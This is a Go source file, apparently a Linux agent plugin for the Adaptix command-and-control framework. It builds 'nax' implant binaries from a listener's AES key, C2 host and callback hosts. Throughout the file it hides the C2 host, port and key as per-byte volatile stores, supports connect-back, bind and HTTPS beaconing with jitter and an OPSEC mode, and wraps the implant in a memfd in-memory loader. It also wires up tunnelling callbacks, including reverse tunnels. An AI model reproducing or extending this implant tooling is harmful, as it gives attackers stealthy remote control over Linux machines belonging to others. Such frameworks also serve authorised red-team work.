package main

import (
	"bytes"
	"encoding/hex"
	"encoding/json"
	"fmt"
	"net"
	"os"
	"os/exec"
	"path/filepath"
	"strconv"
	"strings"
	"sync"

	adaptix "github.com/Adaptix-Framework/axc2/v2"
)

const extenderNameAgents = "linux_agents"
const AgentWatermark = "deadbeef"

var (
	Ts              adaptix.Teamserver
	ModuleDir       string
	AgentWatermarkG string
	agentIdentityCache sync.Map
)

type PluginAgent struct{}

// generateNaxConfigH produces nax_config.h with volatile per-byte write macros
// for the AES key, C2 host and C2 port
func generateNaxConfigH(aesKeyHex, c2Host string, c2Port int, extraHosts []string) ([]byte, error) {
	key, err := hex.DecodeString(aesKeyHex)
	if err != nil || len(key) != 16 {
		return nil, fmt.Errorf("nax_config.h: invalid AES key %q", aesKeyHex)
	}

	var buf bytes.Buffer
	buf.WriteString("/* nax_config.h — generated by BuildPayload. DO NOT EDIT. */\n")
	buf.WriteString("#pragma once\n\n")

	buf.WriteString("/* AES-128 key — per-byte volatile stores */\n")
	writeNaxBytesWriteMacro(&buf, "NAX_AES_KEY_WRITE", key)
	buf.WriteString("\n")

	buf.WriteString("/* C2 host — per-char volatile stores */\n")
	fmt.Fprintf(&buf, "#define NAX_C2_HOST_LEN %du\n", len(c2Host))
	writeNaxCharWriteMacro(&buf, "NAX_C2_HOST_WRITE", c2Host)
	buf.WriteString("\n")

	portLo := byte(c2Port & 0xFF)
	portHi := byte((c2Port >> 8) & 0xFF)
	buf.WriteString("/* C2 port — 2-byte volatile stores */\n")
	fmt.Fprintf(&buf,
		"#define NAX_C2_PORT_WRITE( p ) do { "+
			"volatile uint8_t *_pp = (volatile uint8_t*)(p); "+
			"_pp[0]=0x%02X; _pp[1]=0x%02X; "+
			"} while(0)\n",
		portLo, portHi)

	// Extra callback hosts — for pre-profile host rotation
	// Each entry is "host:port"; inject as NAX_CB_HOST_N_WRITE / NAX_CB_PORT_N
	allHosts := []string{fmt.Sprintf("%s:%d", c2Host, c2Port)}
	for _, h := range extraHosts {
		if h != "" && h != fmt.Sprintf("%s:%d", c2Host, c2Port) {
			allHosts = append(allHosts, h)
		}
	}
	if len(allHosts) > 8 { allHosts = allHosts[:8] }
	fmt.Fprintf(&buf, "\n/* Callback hosts for pre-profile rotation (%d entries) */\n", len(allHosts))
	fmt.Fprintf(&buf, "#define NAX_CB_HOST_COUNT %du\n", len(allHosts))
	for i, entry := range allHosts {
		host := entry
		portN := c2Port
		if idx := len(entry)-1; idx > 0 {
			for j := idx; j >= 0; j-- {
				if entry[j] == ':' {
					host = entry[:j]
					fmt.Sscanf(entry[j+1:], "%d", &portN)
					break
				}
			}
		}
		pLo := byte(portN & 0xFF)
		pHi := byte((portN >> 8) & 0xFF)
		fmt.Fprintf(&buf, "#define NAX_CB_HOST_%d_LEN %du\n", i, len(host))
		writeNaxCharWriteMacro(&buf, fmt.Sprintf("NAX_CB_HOST_%d_WRITE", i), host)
		fmt.Fprintf(&buf, "#define NAX_CB_PORT_%d_WRITE( p ) do { volatile uint8_t *_pp=(volatile uint8_t*)(p); _pp[0]=0x%02X; _pp[1]=0x%02X; } while(0)\n", i, pLo, pHi)
	}

	return buf.Bytes(), nil
}

func writeNaxBytesWriteMacro(buf *bytes.Buffer, name string, data []byte) {
	fmt.Fprintf(buf, "#define %s( p ) do { \\\n", name)
	for i, b := range data {
		if i%8 == 0 {
			buf.WriteString("    ")
		}
		fmt.Fprintf(buf, "(p)[%2d]=0x%02X; ", i, b)
		if i%8 == 7 {
			buf.WriteString("\\\n")
		}
	}
	if len(data)%8 != 0 {
		buf.WriteString("\\\n")
	}
	buf.WriteString("} while(0)\n")
}

func writeNaxCharWriteMacro(buf *bytes.Buffer, name string, s string) {
	fmt.Fprintf(buf, "#define %s( p ) do { \\\n", name)
	for i, c := range s {
		if i%8 == 0 {
			buf.WriteString("    ")
		}
		fmt.Fprintf(buf, "(p)[%2d]='%c'; ", i, c)
		if i%8 == 7 {
			buf.WriteString("\\\n")
		}
	}
	if len(s)%8 != 0 {
		buf.WriteString("\\\n")
	}
	fmt.Fprintf(buf, "    (p)[%2d]='\\0'; \\\n", len(s))
	buf.WriteString("} while(0)\n")
}

func InitPlugin(ts any, moduleDir string, watermark string) adaptix.PluginAgent {
	ModuleDir       = moduleDir
	AgentWatermarkG = watermark
	Ts = ts.(adaptix.Teamserver)
	registerCleanupHooks()
	loadCacheFromStore()
	return &PluginAgent{}
}

func (p *PluginAgent) Call(operator string, agentId int64, function string, args string) {}

func (p *PluginAgent) AgentRestore(agentData adaptix.AgentData) adaptix.AgentFunctions {
	return adaptix.AgentFunctions{
		CreateCommand: CreateCommand,
		PackTasks:     PackTasks,
		ProcessData:   ProcessData,
		Encrypt:       EncryptFn,
		Decrypt:       DecryptFn,
		PivotPackData: PivotPackData,
		TunnelCB: adaptix.TunnelCallbacks{
			ConnectTCP: tunnelConnectTCP,
			ConnectUDP: tunnelConnectUDP,
			WriteTCP:   tunnelWriteTCP,
			WriteUDP:   tunnelWriteUDP,
			Close:      tunnelClose,
			Pause:      tunnelPause,
			Resume:     tunnelResume,
			Reverse:    tunnelReverse,
			BindTCP:    tunnelBindTCP,
		},
	}
}

func naxLog(status adaptix.LogStatus, format string, args ...any) {
	if Ts != nil {
		Ts.TsLogAdd(status, 1, "agent_linux", "nax", format, args...)
	}
}

func naxLogInfo(format string, args ...any) { naxLog(adaptix.LogStatusInfo, format, args...) }
func naxLogOk(format string, args ...any)   { naxLog(adaptix.LogStatusSuccess, format, args...) }
func naxLogErr(format string, args ...any)  { naxLog(adaptix.LogStatusError, format, args...) }

func archString(arch byte) string {
	switch arch {
	case 0x02: return "x64"
	case 0x01: return "x86"
	case 0x04: return "arm64"
	case 0x03: return "arm"
	default:   return "unknown"
	}
}

func linuxOsDesc(major, minor uint32, build uint16, arch string) string {
	if major == 0 && minor == 0 {
		return fmt.Sprintf("Linux (%s)", arch)
	}
	return fmt.Sprintf("Linux %d.%d.%d (%s)", major, minor, build, arch)
}

func EncryptFn(data []byte, key []byte) ([]byte, error) { return EncryptCBCRandomIV(key, data) }
func DecryptFn(data []byte, key []byte) ([]byte, error) { return DecryptCBC(key, data) }

func main() {}

func (p *PluginAgent) BuildPayload(profile adaptix.BuildProfile, agentProfiles [][]byte) ([]byte, string, error) {
	modDir := ModuleDir
	var args map[string]any
	if profile.AgentConfig != "" {
		if err := json.Unmarshal([]byte(profile.AgentConfig), &args); err != nil {
			return nil, "", fmt.Errorf("linux agent: failed to parse agent config: %w", err)
		}
	}
	if args == nil {
		args = make(map[string]any)
	}

	arch    := getStr(args, "arch",     "x64")
	tcpMode := getStr(args, "tcp_mode", "bind (pivot — wait for parent)")
	inMem   := false
	if v, ok := args["inmem"].(bool); ok { inMem = v }
	outFormat := getStr(args, "format", "elf")
	opsec   := false
	if v, ok := args["opsec"].(bool); ok { opsec = v }
	sleepSec  := uint32(5)   // default 5s — spinner sends seconds
	jitterPct := uint32(0)
	if v, ok := args["sleep_ms"].(float64); ok && v >= 0 { sleepSec = uint32(v) }
	if v, ok := args["jitter_pct"].(float64); ok && v >= 0 && v <= 100 { jitterPct = uint32(v) }
	sleepMs := sleepSec * 1000  // convert to ms for NAX_SLEEP_MS

	aesKey           := "00000000000000000000000000000000"
	listenerBindPort := "4444"
	listenerC2Host   := ""
	listenerC2Port   := "4444"
	var callbackHosts []string
	if len(profile.ListenerProfiles) > 0 {
		var listenerCfg struct {
			EncryptKey     string   `json:"encrypt_key"`
			BindPort       any      `json:"bind_port"`
			PortBind       any      `json:"port_bind"`
			C2Host         string   `json:"c2_host"`
			C2Port         any      `json:"c2_port"`
			TcpMode        string   `json:"tcp_mode"`
			CallbacksHosts []string `json:"callbacks_hosts"`
		}
		if err := json.Unmarshal(profile.ListenerProfiles[0].Profile, &listenerCfg); err == nil {
			if listenerCfg.EncryptKey != "" { aesKey = listenerCfg.EncryptKey }
			switch v := listenerCfg.BindPort.(type) {
			case float64: listenerBindPort = fmt.Sprintf("%.0f", v)
			case string:  if v != "" { listenerBindPort = v }
			}
			// Use callbacks_hosts[0] as C2 host
			if listenerCfg.C2Host != "" {
				listenerC2Host = listenerCfg.C2Host
			} else if len(listenerCfg.CallbacksHosts) > 0 {
				h := listenerCfg.CallbacksHosts[0]
				// callbacks_hosts entry is "host:port" — split them
				if host, port, e2 := net.SplitHostPort(h); e2 == nil {
					listenerC2Host = host
					if port != "" { listenerC2Port = port }
				} else {
					// No port in string — use as-is
					listenerC2Host = h
				}
			}
			// Safety: strip any port that may have leaked into c2_host
			if host, port, e2 := net.SplitHostPort(listenerC2Host); e2 == nil {
				listenerC2Host = host
				if port != "" && listenerC2Port == "4444" { listenerC2Port = port }
			}
			callbackHosts = listenerCfg.CallbacksHosts
			if listenerCfg.TcpMode != "" { tcpMode = listenerCfg.TcpMode }
			switch v := listenerCfg.C2Port.(type) {
			case float64: listenerC2Port = fmt.Sprintf("%.0f", v)
			case string:  if v != "" { listenerC2Port = v }
			}
			// port_bind fallback (HTTPS listener uses port_bind, not c2_port)
			if listenerC2Port == "4444" {
				switch v := listenerCfg.PortBind.(type) {
				case float64: if v > 0 { listenerC2Port = fmt.Sprintf("%.0f", v) }
				case string:  if v != "" { listenerC2Port = v }
				}
			}
		}
	}

	wm        := "deadbeef"
	debugMode := getStr(args, "debug", "false")
	isBind    := strings.HasPrefix(tcpMode, "bind")
	isHttps   := strings.HasPrefix(tcpMode, "https")

	naxRoot, err := getNaxRoot(modDir)
	if err != nil {
		return nil, "", fmt.Errorf("linux agent: cannot find NAX root: %w", err)
	}
	srcDir := filepath.Join(naxRoot, "nax_linux")

	cc := "gcc"
	switch arch {
	case "arm64": cc = "aarch64-linux-gnu-gcc"
	}

	naxDebug := "0"
	if debugMode == "true" || debugMode == "1" { naxDebug = "1" }

	// Generate nax_config.h with volatile write macros
	if isHttps || !isBind {
		c2PortInt := 4444
		if p, err2 := strconv.Atoi(listenerC2Port); err2 == nil { c2PortInt = p }
		c2h := listenerC2Host
		if c2h == "" { c2h = "127.0.0.1" }
		if isHttps && c2h == "" { c2h = "127.0.0.1" }
		configH, err2 := generateNaxConfigH(aesKey, c2h, c2PortInt, callbackHosts)
		if err2 != nil {
			return nil, "", fmt.Errorf("linux agent: generateNaxConfigH: %w", err2)
		}
		configPath := filepath.Join(srcDir, "include", "nax_config.h")
		_ = os.WriteFile(configPath, configH, 0644)
	}

	makeArgs := []string{
		fmt.Sprintf("CC=%s", cc),
		fmt.Sprintf("NAX_AES_KEY=%s", aesKey),
		fmt.Sprintf("NAX_LISTENER_WM=0x%s", wm),
		fmt.Sprintf("NAX_DEBUG=%s", naxDebug),
	}

	if outFormat == "so" {
		makeArgs = append(makeArgs, "NAX_FORMAT=so")
	}
	if opsec {
		makeArgs = append(makeArgs, "NAX_OPSEC=1")
	}

	suffix := ""
	if isBind {
		makeArgs = append(makeArgs, "NAX_TCP_MODE=bind",
			fmt.Sprintf("NAX_BIND_PORT=%s", listenerBindPort))
		suffix = "_bind"
	} else if isHttps {
		// Locate OpenSSL headers for cross-compilation.
		// Native x64 uses /usr/include/openssl directly.
		// Cross targets need the multiarch path (e.g. /usr/include/aarch64-linux-gnu/openssl).
		if arch != "x64" {
			pkgArchMap := map[string]string{"arm64": "arm64"}
			pkgArch := pkgArchMap[arch]

			// Find opensslconf.h for target arch using dpkg -L or find
			findCmd := exec.Command("bash", "-c",
				fmt.Sprintf("dpkg -L libssl-dev:%s 2>/dev/null | grep opensslconf.h | head -1", pkgArch))
			foundPath, findErr := findCmd.Output()
			sslIncDir := ""
			if findErr == nil && len(foundPath) > 0 {
				// Extract the include directory (parent of openssl/)
				p := strings.TrimSpace(string(foundPath))
				sslIncDir = filepath.Dir(filepath.Dir(p))
			}
			if sslIncDir == "" {
				return nil, "", fmt.Errorf("HTTPS on %s requires OpenSSL cross-headers.\nInstall with:\n  sudo dpkg --add-architecture %s\n  sudo apt-get update\n  sudo apt-get install libssl-dev:%s", arch, pkgArch, pkgArch)
			}
			makeArgs = append(makeArgs, fmt.Sprintf("OPENSSL_INC=%s", sslIncDir))
		}
		c2h := listenerC2Host
		if c2h == "" { c2h = "127.0.0.1" }
		port := listenerC2Port
		if port == "" { port = "443" }
		makeArgs = append(makeArgs, "NAX_TCP_MODE=https",
			fmt.Sprintf("NAX_C2_HOST=%s", c2h),
			fmt.Sprintf("NAX_C2_PORT=%s", port),
			fmt.Sprintf("NAX_SLEEP_MS=%d", sleepMs),
			fmt.Sprintf("NAX_JITTER_PCT=%d", jitterPct))
		suffix = "_https"
	} else {
		c2h := listenerC2Host
		if c2h == "" { c2h = "127.0.0.1" }
		makeArgs = append(makeArgs, "NAX_TCP_MODE=connect",
			fmt.Sprintf("NAX_C2_HOST=%s", c2h),
			fmt.Sprintf("NAX_C2_PORT=%s", listenerC2Port))
	}

	cmd := exec.Command("make", makeArgs...)
	cmd.Dir = srcDir
	out, err := cmd.CombinedOutput()
	if err != nil {
		return nil, "", fmt.Errorf("linux agent: build failed:\n%s", string(out))
	}

	debugSuffix := ""
	if naxDebug == "1" { debugSuffix = "_debug" }
	soSuffix := ""
	if outFormat == "so" { soSuffix = ".so" }
	binPath := filepath.Join(srcDir, "_bin", "nax_linux"+suffix+debugSuffix+soSuffix)
	data, err := os.ReadFile(binPath)
	if err != nil {
		return nil, "", fmt.Errorf("linux agent: binary not found after build: %w", err)
	}

	filename := fmt.Sprintf("nax_linux_%s%s%s%s", arch, suffix, debugSuffix, soSuffix)
	naxLogOk("BuildPayload: compiled %s (%d bytes)", filename, len(data))

	if !inMem {
		return data, filename, nil
	}

	loaderData, loaderName, loaderErr := buildInMemLoader(srcDir, cc, data, filename)
	if loaderErr != nil {
		naxLogErr("BuildPayload: in-memory loader build failed: %v", loaderErr)
		return nil, "", loaderErr
	}
	naxLogOk("BuildPayload: in-memory loader %s (%d bytes)", loaderName, len(loaderData))
	return loaderData, loaderName, nil
}

func (p *PluginAgent) GenerateProfiles(_ adaptix.BuildProfile) ([][]byte, error) {
	return [][]byte{{}}, nil
}

func getStr(args map[string]any, key, def string) string {
	if v, ok := args[key]; ok {
		switch x := v.(type) {
		case string:  if x != "" { return x }
		case float64: return fmt.Sprintf("%.0f", x)
		case bool:    if x { return "true" }; return "false"
		}
	}
	return def
}

func getNaxRoot(modDir string) (string, error) {
	// Read nax_root.conf written by setup_nax.sh next to the deployed .so
	confPath := filepath.Join(modDir, "nax_root.conf")
	if data, err := os.ReadFile(confPath); err == nil {
		root := strings.TrimSpace(string(data))
		if root != "" {
			if _, err2 := os.Stat(filepath.Join(root, "nax_linux")); err2 == nil {
				return root, nil
			}
		}
	}
	return "", fmt.Errorf("cannot find nax_linux directory — check nax_root.conf in %s", modDir)
}

func buildInMemLoader(srcDir, cc string, elfBytes []byte, baseName string) ([]byte, string, error) {
	// Generate loader_payload.h with the ELF as a C byte array
	var hdr strings.Builder
	hdr.WriteString("/* auto-generated — do not edit */\n")
	fmt.Fprintf(&hdr, "#define PAYLOAD_LEN %du\n", len(elfBytes))
	hdr.WriteString("static const unsigned char payload[] = {\n")
	for i, b := range elfBytes {
		if i%16 == 0 {
			hdr.WriteString("\t")
		}
		fmt.Fprintf(&hdr, "0x%02x,", b)
		if i%16 == 15 {
			hdr.WriteString("\n")
		}
	}
	hdr.WriteString("\n};\n")

	// Write header to a temp dir
	tmpDir, err := os.MkdirTemp("", "nax_loader_*")
	if err != nil {
		return nil, "", fmt.Errorf("inmem: mktemp: %w", err)
	}
	defer os.RemoveAll(tmpDir)

	hdrPath    := filepath.Join(tmpDir, "loader_payload.h")
	outPath    := filepath.Join(tmpDir, "loader")
	loaderSrc  := filepath.Join(srcDir, "src", "Loader", "memfd_loader.c")

	if err := os.WriteFile(hdrPath, []byte(hdr.String()), 0644); err != nil {
		return nil, "", fmt.Errorf("inmem: write header: %w", err)
	}

	// Compile the loader with the embedded payload
	cmd := exec.Command(cc,
		"-O2", "-static",
		"-include", hdrPath,
		"-o", outPath,
		loaderSrc,
	)
	if out, err := cmd.CombinedOutput(); err != nil {
		return nil, "", fmt.Errorf("inmem: compile loader:\n%s", string(out))
	}

	data, err := os.ReadFile(outPath)
	if err != nil {
		return nil, "", fmt.Errorf("inmem: read loader: %w", err)
	}

	return data, baseName + "_inmem", nil
}
